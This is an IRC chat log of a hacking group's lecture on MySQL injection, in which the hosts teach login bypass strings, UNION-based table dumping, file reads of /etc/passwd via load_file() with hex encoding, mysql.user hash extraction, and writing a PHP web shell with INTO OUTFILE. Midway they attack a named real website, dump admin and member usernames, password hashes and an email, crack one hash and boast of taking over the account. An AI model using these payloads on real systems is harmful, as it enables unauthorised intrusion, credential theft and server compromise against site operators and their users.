____ _ _ _ ___ __ _ __ / ___| ___ | \ | |_ _| | \ \ / /__ _ _ _ __ ___ ___| |/ _| ___ _ __ __ _ | | _ / _ \| \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` | | |_| | (_) | |\ | |_| | | | | | (_) | |_| | | \__ \ __/ | _| (_) | | | (_| | \____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_| |___/\___|_|_|(_)___/|_| \__, | ---------------------------------------------------------------------------|___/ [2:02pm] pSyChOmOnkee: SQL Injection [2:02pm] pSyChOmOnkee: lets define it first [2:02pm] pSyChOmOnkee: from a newb perspective [2:02pm] sToRm: say a site has the script: [2:03pm] sToRm: mysql_query('SELECT * FROM table WHERE id = '.$_GET['id']); [2:03pm] pSyChOmOnkee: and it runs with php and mysql for databases [2:03pm] pSyChOmOnkee: some sites [2:03pm] pSyChOmOnkee: can use other sql systems [2:03pm] pSyChOmOnkee: such as mssql [2:03pm] pSyChOmOnkee: and protege sql or whatever that one is called [2:04pm] sToRm: we can insert ("inject") code into the GET variable "id" [2:06pm] sToRm: and essentially take over the query into mysql [2:06pm] sToRm: different DB software will require different injections [2:06pm] sToRm: we will explain MySQL injection [2:06pm] sToRm: ok [2:06pm] sToRm: so [2:06pm] sToRm: let's talk about how to find a vuln site [2:06pm] sToRm: the most common method is mysql_query('query..') or die(mysql_error()); [2:06pm] sToRm: so [2:06pm] sToRm: if there is an error in the MySQL query, [2:08pm] sToRm: the most common error detection that people use is mysql_query('query..') or die(mysql_error()); [2:08pm] sToRm: so if the query is messed up [2:08pm] sToRm: it will give us an ugly mysql error message [2:08pm] pSyChOmOnkee: the error gives out information [2:08pm] sToRm: the most important information being that it's vuln [2:09pm] sToRm: a good way of testing if a site is vuln is by adding an apostrophe to the query [2:09pm] sToRm: i.e.: [2:09pm] sToRm: site.com/index.php?id=' [2:09pm] sToRm: it may spit out something like [2:09pm] sToRm: Query fatal error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''8' at line 1 [2:09pm] sToRm: or a mysql_fetch error [2:10pm] sToRm: every site is different [2:10pm] sToRm: so [2:10pm] sToRm: once we found a site [2:10pm] sToRm: that is vuln [2:10pm] sToRm: we need to inject it [2:10pm] sToRm: and take over the MySQL query [2:10pm] pSyChOmOnkee: to prove the concept [2:11pm] pSyChOmOnkee: the injection will add additional commands to the mysql query [2:11pm] pSyChOmOnkee: such as /index.php?id=1 and 1=0-- [2:12pm] pSyChOmOnkee: -- being one way to comment (commenting any additional code) [2:12pm] pSyChOmOnkee: /* is another type of commenting [2:13pm] sToRm: by inserting this string, the MySQL query becomes: SELECT * FROM table WHERE id = 1 and 1=0 [2:13pm] sToRm: which will error, because although [2:13pm] sToRm: there may be a row where id = 1 [2:14pm] sToRm: but 1 doesn't equal 0 [2:14pm] sToRm: therefore returning no results [2:14pm] sToRm: and like pSyChO said, -- or /* is a MySQL comment [2:14pm] sToRm: so [2:14pm] sToRm: say the query was [2:15pm] sToRm: SELECT * FROM users WHERE username = '.$_GET['username'].' AND password = '.$_GET['password'] [2:15pm] sToRm: assuming we're using php here [2:15pm] sToRm: we'd have the script collect variables through: [2:15pm] sToRm: login.php?username=name&password=pass [2:15pm] sToRm: we could inject it by: [2:16pm] sToRm: login.php?username=Admin--&password=whatever [2:16pm] sToRm: the -- would comment out the rest of the statement [2:16pm] sToRm: the part where it checks the password [2:16pm] sToRm: SELECT * FROM users WHERE username = Admin-- AND password = '.$_GET['password'] [2:16pm] sToRm: so in actuality, it's really [2:16pm] sToRm: SELECT * FROM users WHERE username = Admin [2:16pm] sToRm: boom [2:16pm] sToRm: the query finds the row Admin [2:16pm] sToRm: and you're logged in [2:17pm] sToRm: but [2:17pm] sToRm: MySQL injection is mostly used for getting information from tables [2:17pm] sToRm: not necessarially bypassing logins [2:17pm] sToRm: the information we usually gather is logins, though [2:17pm] sToRm: so [2:17pm] sToRm: say you found a vuln site [2:18pm] sToRm: index.php?id=' [2:18pm] sToRm: gives an error [2:18pm] sToRm: we would start the injection by: [2:18pm] sToRm: index.php?id=null+ORDER+BY+1-- [2:18pm] sToRm: we would then check if there is no error returned [2:18pm] sToRm: if there is no error, then we are good [2:19pm] pSyChOmOnkee: k [2:19pm] pSyChOmOnkee: I hope everyone understands things thus far [2:19pm] sToRm: any questions so far? [2:19pm] pSyChOmOnkee: or comments? [2:19pm] dioms: nop [2:20pm] pSyChOmOnkee: PM me if you have any questions [2:20pm] pSyChOmOnkee: and I will answer them [2:20pm] pSyChOmOnkee: but for now I'll continue [2:20pm] pSyChOmOnkee: as sToRm said [2:21pm] pSyChOmOnkee: sql injections can be used for getting information from tables [2:21pm] pSyChOmOnkee: or bypassing logins [2:21pm] pSyChOmOnkee: to quickly cover the login bypassing [2:22pm] pSyChOmOnkee: http://www.gonullyourself.org/main/index.php [2:22pm] pSyChOmOnkee: sign out if you are signed in [2:22pm] pSyChOmOnkee: and you can see the username and password fields [2:22pm] pSyChOmOnkee: this won't work on GNY, but here is an example of a simple sql injection login bypass [2:22pm] pSyChOmOnkee: username: ' OR 'a' [2:22pm] pSyChOmOnkee: password: ' OR 'a' [2:23pm] pSyChOmOnkee: this makes it SELECT user FROM table_users WHERE username = ' OR 'a' AND password = ' OR 'a' [2:24pm] pSyChOmOnkee: instead of username = username and password = password [2:24pm] pSyChOmOnkee: which would work [2:24pm] pSyChOmOnkee: but the point is to bypass it [2:24pm] pSyChOmOnkee: there are different simple login injections to try on a site [2:24pm] pSyChOmOnkee: but that explains the concept for all of them [2:25pm] pSyChOmOnkee: okay [2:25pm] pSyChOmOnkee: now on to getting information from tables [2:25pm] pSyChOmOnkee: this is the good part of sql injection where you could possible extract an admin username and password hash [2:25pm] pSyChOmOnkee: to begin I like to try and map out what the database contains [2:26pm] pSyChOmOnkee: every database has columns and rows [2:26pm] pSyChOmOnkee: to see how large the databse is [2:27pm] pSyChOmOnkee: you can inject index.php?id= [2:27pm] pSyChOmOnkee: starting with id=1 [2:27pm] pSyChOmOnkee: all the way until you get an error saying there is no such user to match that id [2:27pm] pSyChOmOnkee: so if it gives an error on id=35 [2:27pm] pSyChOmOnkee: then we know there are 34 users [2:28pm] pSyChOmOnkee: to help us do this we can download a firefox addon [2:28pm] pSyChOmOnkee: called HackBar [2:28pm] pSyChOmOnkee: it allows you to select a piece of a url and increment it by 1 if it is an integer [2:29pm] pSyChOmOnkee: and this will automate the proccess of exploring the size of the database [2:29pm] sToRm: ok [2:29pm] sToRm: quick questions [2:29pm] pSyChOmOnkee: anything? [2:29pm] oXiKoTToN: http://www.gonullyourself.org/main/admin <- lmfao [2:30pm] oXiKoTToN: all i gotta say [2:30pm] pSyChOmOnkee: lolk [2:31pm] pSyChOmOnkee: again, PM if anything comes up that you want to clarify [2:36pm] sToRm: ok [2:37pm] sToRm: so [2:37pm] sToRm: we've been over vuln statements [2:37pm] sToRm: now [2:37pm] sToRm: we'll learn how to inject them [2:37pm] sToRm: and pull data from tables [2:37pm] sToRm: first [2:37pm] sToRm: index.php?vuln=null+ORDER+BY+1-- [2:37pm] sToRm: if that produces no error [2:37pm] sToRm: we're good [2:37pm] sToRm: so [2:37pm] sToRm: let's increment 1 [2:37pm] sToRm: by 1 [2:37pm] sToRm: until it gives us an error [2:38pm] sToRm: so [2:38pm] sToRm: index.php?vuln=null+ORDER+BY+2-- [2:38pm] sToRm: index.php?vuln=null+ORDER+BY+3-- [2:38pm] sToRm: index.php?vuln=null+ORDER+BY+4-- [2:38pm] sToRm: etc. [2:38pm] sToRm: until it errors [2:38pm] sToRm: when it does [2:38pm] sToRm: say at [2:38pm] sToRm: index.php?vuln=null+ORDER+BY+13-- [2:38pm] sToRm: that means there are 12 columns [2:38pm] sToRm: in the current table [2:38pm] sToRm: so [2:38pm] sToRm: now that we know how many columns are in the table [2:38pm] sToRm: let's find what data from the table is echoed to the script [2:39pm] sToRm: we will do this with a UNION command [2:39pm] sToRm: UNION will effectively add a second query to the first [2:39pm] sToRm: and it will execute it [2:39pm] sToRm: index.php?vuln=null+UNION+ALL+SELECT [2:39pm] sToRm: now [2:39pm] sToRm: because there are 13 columns [2:39pm] sToRm: we would do: [2:39pm] sToRm: index.php?vuln=null+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13-- [2:40pm] sToRm: if there is still no error, we're doing great [2:40pm] sToRm: now [2:40pm] sToRm: hopefully [2:40pm] sToRm: there will be some numbers randomly on the page [2:40pm] sToRm: between 1 and 13 [2:40pm] sToRm: these are the vuln columns [2:40pm] sToRm: so [2:40pm] sToRm: say there was a 3, 7, and 10 on the page [2:40pm] sToRm: we can inject columns 3, 7, and 10 [2:40pm] sToRm: so [2:40pm] sToRm: here's an example [2:41pm] sToRm: we are going to hack http://www.freepremiumaccounts.com [2:41pm] sToRm: this is an odd example, though [2:41pm] sToRm: but the concept is still there [2:41pm] sToRm: remember, every site is different [2:41pm] sToRm: so [2:41pm] sToRm: http://www.freepremiumaccounts.com/?p=offers&go= [2:41pm] sToRm: the GET variable "go" is vuln [2:42pm] sToRm: if we do ORDER BY, we find there is only one column [2:42pm] sToRm: so our injection will become: [2:42pm] sToRm: http://www.freepremiumaccounts.com/?p=offers&go=null+UNION+ALL+SELECT+1-- [2:42pm] sToRm: it will redirect to http://www.freepremiumaccounts.com/1 [2:42pm] sToRm: because the site is weird [2:42pm] sToRm: but as you can see, 1 is vuln [2:42pm] sToRm: how to inject this vuln? [2:43pm] sToRm: let's start with MySQL variables [2:43pm] sToRm: there are a set of variables that are pre-defined in MySQL [2:43pm] sToRm: a few are @@version, user() [2:43pm] sToRm: there are more [2:43pm] sToRm: @@version tells us the MySQL version [2:43pm] sToRm: user() tells us the username to the mysql login [2:44pm] sToRm: so [2:44pm] sToRm: http://www.freepremiumaccounts.com/?p=offers&go=null+UNION+ALL+SELECT+@@version-- [2:44pm] sToRm: will give us [2:44pm] sToRm: http://www.freepremiumaccounts.com/4.1.22-standard [2:44pm] sToRm: user() [2:44pm] sToRm: http://www.freepremiumaccounts.com/free_free@localhost [2:44pm] sToRm: so [2:44pm] sToRm: now to pull data [2:45pm] sToRm: in order to construct a query that will pull data from a table, we need to figure out two things [2:45pm] sToRm: the name of the table [2:45pm] sToRm: and the name(s) of the columns we want [2:45pm] sToRm: http://www.freepremiumaccounts.com/?p=offers&go=null+UNION+ALL+SELECT+1+FROM+users-- [2:45pm] sToRm: users is the table name [2:45pm] sToRm: a very informational table at that [2:46pm] sToRm: learning table names is a guess-and-check process [2:46pm] sToRm: common ones are: users, user, members, member, admins, etc. [2:46pm] sToRm: so [2:46pm] sToRm: once we find a table [2:46pm] sToRm: we are going to try to find column names [2:47pm] sToRm: http://www.freepremiumaccounts.com/?p=offers&go=null+UNION+ALL+SELECT+username+FROM+users-- [2:47pm] sToRm: will pull the column username [2:47pm] sToRm: but [2:47pm] sToRm: we don't want just the column username [2:47pm] sToRm: we also want the column password [2:47pm] sToRm: so [2:47pm] sToRm: we use a command called concat [2:48pm] sToRm: http://www.freepremiumaccounts.com/?p=offers&go=null+UNION+ALL+SELECT+concat(username,password)+FROM+users-- [2:48pm] sToRm: as you can see [2:48pm] sToRm: we get [2:48pm] sToRm: admin234330ee08c99eadaa632221f5252587957 [2:48pm] sToRm: admin is our username [2:48pm] sToRm: 330ee08c99eadaa632221f5252587957 is the hash [2:48pm] sToRm: md5 [2:48pm] sToRm: !bot @decrypt 330ee08c99eadaa632221f5252587957 [2:49pm] [HaShBoT]: |.: MD5 :.| No match for 330ee08c99eadaa632221f5252587957 [2:49pm] pSyChOmOnkee: kfine [2:49pm] sToRm: well [2:49pm] sToRm: try to crack it [2:49pm] sToRm: lo [2:49pm] sToRm: so [2:49pm] sToRm: now we can pull data from the columns username and password [2:49pm] sToRm: now let's control which user to pull [2:49pm] sToRm: we will do this with the WHERE clause [2:50pm] pSyChOmOnkee: this acts similar to an if then statement [2:50pm] sToRm: http://www.freepremiumaccounts.com/?p=offers&go=null+UNION+ALL+SELECT+concat(username,password)+FROM+users+WHERE+id=1-- [2:50pm] sToRm: admin234 is at id=1 [2:50pm] sToRm: if we tweak it to. say [2:50pm] sToRm: id = 2 [2:50pm] sToRm: we will get the second member [2:50pm] sToRm: http://www.freepremiumaccounts.com/?p=offers&go=null+UNION+ALL+SELECT+concat(username,password)+FROM+users+WHERE+id=2-- [2:50pm] sToRm: Jensab823e401a3228803898cd9af9ebae8cd [2:50pm] pSyChOmOnkee: and don't forget to check id=0 [2:50pm] sToRm: ^^ [2:51pm] pSyChOmOnkee: although it is nobody [2:51pm] pSyChOmOnkee: on this site [2:51pm] pSyChOmOnkee: it may be an admin on another site [2:51pm] sToRm: so [2:51pm] sToRm: now we are able to pull data from tables [2:51pm] sToRm: and control which row we pull [2:51pm] sToRm: we can enumerate the site [2:51pm] sToRm: and pull any user we wish to [2:51pm] sToRm: crash their hash [2:51pm] sToRm: login [2:51pm] pSyChOmOnkee: !bot @decrypt b823e401a3228803898cd9af9ebae8cd [2:51pm] sToRm: get their email [2:51pm] sToRm: etc. [2:51pm] [HaShBoT]: |.: MD5 :.| b823e401a3228803898cd9af9ebae8cd = luder123 [2:52pm] pSyChOmOnkee: username: Jensa [2:52pm] pSyChOmOnkee: k [2:52pm] sToRm: we just got an account [2:52pm] sToRm: this is the beauty of SQL injection [2:52pm] . pSyChOmOnkee high fives hashbot [2:52pm] sToRm made this room no longer moderated for normal users. [2:52pm] sToRm: questions? [2:52pm] pSyChOmOnkee: http://www.freepremiumaccounts.com/admin234330ee08c99eadaa632221f5252587957freepremiumaccounts@gmail.com [2:52pm] pSyChOmOnkee: emails too [2:53pm] sToRm: http://www.freepremiumaccounts.com/?p=offers&go=null+UNION+ALL+SELECT+concat(username,password,email)+FROM+users+WHERE+id=1-- [2:53pm] sToRm: etc [2:53pm] pSyChOmOnkee: and you can try other random table names [2:53pm] pSyChOmOnkee: for more information [2:53pm] h4ck3d joined the chat room. [2:53pm] sToRm: the userbase is usually the most sought-after table, though [2:53pm] NullBoT set a limit on the number of room members to 23. [2:54pm] sToRm: so [2:54pm] pSyChOmOnkee: unless you want to see who has enough referals to redeem an account [2:54pm] sToRm: [2:54pm] sToRm: lol [2:54pm] pSyChOmOnkee: or if we look hard enough [2:54pm] pSyChOmOnkee: they may be storing rapidshare accounts in mysql [2:54pm] pSyChOmOnkee: doubt it though [2:55pm] pSyChOmOnkee: but anyway there is huge possibility amongst these types of attacks [2:55pm] sToRm: so [2:55pm] sToRm: now that we've successfully hacked www.freepremiumaccounts.com [2:55pm] sToRm: and gained the ability to pull users [2:55pm] ZiL0: CAN WE DELETE SHIT?! [2:55pm] x2Fusion: Now get that uploading done ya hear, root that nig [2:56pm] x2Fusion: An lmao at zil0 [2:56pm] sToRm: lol [2:56pm] sToRm: yes [2:56pm] ZiL0: show me.. [2:56pm] ZiL0: delete jensen [2:56pm] sToRm: we can manipulate shit [2:56pm] sToRm: take it away psycho [2:56pm] pSyChOmOnkee: I was going to cover something else real quick [2:56pm] sToRm: sure [2:56pm] pSyChOmOnkee: another mysql function [2:57pm] pSyChOmOnkee: load_file() [2:57pm] pSyChOmOnkee: this will only work on some sites [2:57pm] pSyChOmOnkee: but as with all sql injections, we may get lucky [2:58pm] sToRm: you need mysql root privileges [2:58pm] sToRm: go on [2:59pm] pSyChOmOnkee: we can try to load [2:59pm] pSyChOmOnkee: a few things from this [2:59pm] pSyChOmOnkee: such as .htaccess [2:59pm] pSyChOmOnkee: or on a unix box /etc/passwd [3:00pm] pSyChOmOnkee: this can give us more information on the site, or even the server's password file [3:00pm] pSyChOmOnkee: and on to x2's rooting [3:00pm] pSyChOmOnkee: okay [3:00pm] pSyChOmOnkee: so how do I use this function? [3:01pm] x2Fusion: load_file('/etc/passwd') [3:01pm] x2Fusion: etc, if add slashes is on then you need to hex it up [3:01pm] x2Fusion: load_file(0x272F6574632F70617373776427) [3:01pm] pSyChOmOnkee: yeah [3:01pm] pSyChOmOnkee: or [3:01pm] pSyChOmOnkee: we can use [3:01pm] pSyChOmOnkee: char() [3:02pm] pSyChOmOnkee: another function [3:02pm] pSyChOmOnkee: it will change decimal ascii into string format [3:03pm] pSyChOmOnkee: load_file(char(47, 104, 111, 109, 101, 47, 115, 105, 116, 101, 110, 97, 109, 101, 47, 100, 105, 114, 47, 97, 108, 108, 111, 102, 116, 104, 105, 115, 105, 115, 102, 114, 111, 109, 111, 117, 114, 102, 112, 100, 47, 46, 104, 116, 97, 99, 99, 101, 115, 115)) [3:03pm] pSyChOmOnkee: I believe that will load .htaccess [3:03pm] pSyChOmOnkee: and as you see [3:03pm] pSyChOmOnkee: does not user slashes [3:03pm] pSyChOmOnkee: and will still parse as a string [3:03pm] x2Fusion: load_file(0x272F6574632F70617373776427) is for /etc/passwd btw. [3:04pm] sToRm: ^^ [3:05pm] sToRm: just a reminder [3:05pm] sToRm: you need mysql root privileges [3:05pm] sToRm: so it's a matter of luck [3:05pm] sToRm: to load files [3:05pm] sToRm: etc. [3:05pm] pSyChOmOnkee: and we happen to be unlucky on the free rapidshare site [3:06pm] sToRm: you would put the load_file() in the place of the 1 or the @@version or whatever [3:06pm] sToRm: and it would echo the results to the script [3:06pm] DeadlyData: PEKA BOO! [3:06pm] pSyChOmOnkee: hi Deadly [3:06pm] sToRm: yo [3:06pm] DeadlyData: sup kids? [3:07pm] sToRm: sql injection lecture [3:07pm] sToRm: at this moment [3:07pm] sToRm: rofl [3:07pm] DeadlyData: mm [3:07pm] sToRm: ok [3:07pm] . DeadlyData Sits back and enjoys the view. [3:07pm] sToRm: last thing [3:07pm] sToRm: we will explain [3:07pm] sToRm: is how to gain mysql root [3:07pm] sToRm: this will only work if the server is v5 [3:07pm] sToRm: hence why @@version is important [3:08pm] sToRm: (most) v5 servers have a table named mysql.user [3:08pm] sToRm: which contains hashes and usernames to mysql login [3:08pm] pSyChOmOnkee: (note: the site we injected was v4 remember) [3:08pm] sToRm: ^^ [3:08pm] sToRm: if you find this, you're lucky [3:08pm] sToRm: so [3:10pm] sToRm: basically, mysql.user is pulled by: concat(user,0x3a,password)+FROM+mysql.user-- [3:10pm] sToRm: etc. [3:11pm] sToRm: you get mysql hashes [3:11pm] sToRm: crack them [3:11pm] sToRm: win [3:11pm] sToRm: ok [3:11pm] sToRm: explain outfile pl0x [3:11pm] DeadlyData: sToRm, Question. [3:11pm] sToRm: yar [3:11pm] DeadlyData: What kinda of hashes are those? [3:11pm] DeadlyData: Might help people. [3:11pm] sToRm: mysqlsha1 [3:11pm] sToRm: jtr won't load them [3:11pm] sToRm: so use passwordspro [3:11pm] pSyChOmOnkee: and they are not md5 [3:11pm] pSyChOmOnkee: like the ones from before [3:12pm] sToRm: you can tell if it's mysqlsha1 if it has a * in front of it [3:12pm] sToRm: and is all caps [3:12pm] sToRm: usually [3:12pm] sToRm: the string [3:12pm] sToRm: mypass [3:12pm] sToRm: is hashed to: [3:12pm] sToRm: *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 [3:12pm] x2Fusion: yar [3:13pm] sToRm: so [3:13pm] sToRm: fin mysql.user [3:13pm] sToRm: lol [3:13pm] pSyChOmOnkee: k outfile time [3:14pm] pSyChOmOnkee: SELECT columns FROM table_name WHERE whatever='something' INTO OUTFILE "/tmp/outfile.txt"; [3:14pm] sToRm: or /public_html/shell.php [3:14pm] DeadlyData: yeah [3:14pm] DeadlyData: except it requires root/you need to have the full path [3:15pm] x2Fusion: Yeah, mostly has to be under (system/mysql) root. [3:15pm] pSyChOmOnkee: and the full path [3:15pm] pSyChOmOnkee: can be obtained [3:15pm] pSyChOmOnkee: from your original injection [3:15pm] DeadlyData: and you basiclly just enter php shell code inside of a column [3:15pm] DeadlyData: and pull it out into a php file [3:15pm] DeadlyData: via the INTO OUTFILE command. [3:15pm] DeadlyData: then just visit the shell and it will execute. [3:16pm] GunniH: hey pSyChOmOnkee [3:16pm] GunniH: hey sToRm [3:16pm] pSyChOmOnkee: so, in the end, if you get lucky, you can root, shell and sql inject the same site all at once [3:16pm] dioms: mmm, how do I know if I have mysql root? [3:16pm] DeadlyData: in your sql injection [3:16pm] DeadlyData: use the function [3:17pm] DeadlyData: user() [3:17pm] DeadlyData: and it will echo on to the page [3:17pm] DeadlyData: what user you are currently under. [3:17pm] DeadlyData: so replace one of the column counted numbers with "user()" [3:18pm] pSyChOmOnkee: any other questions? FIN!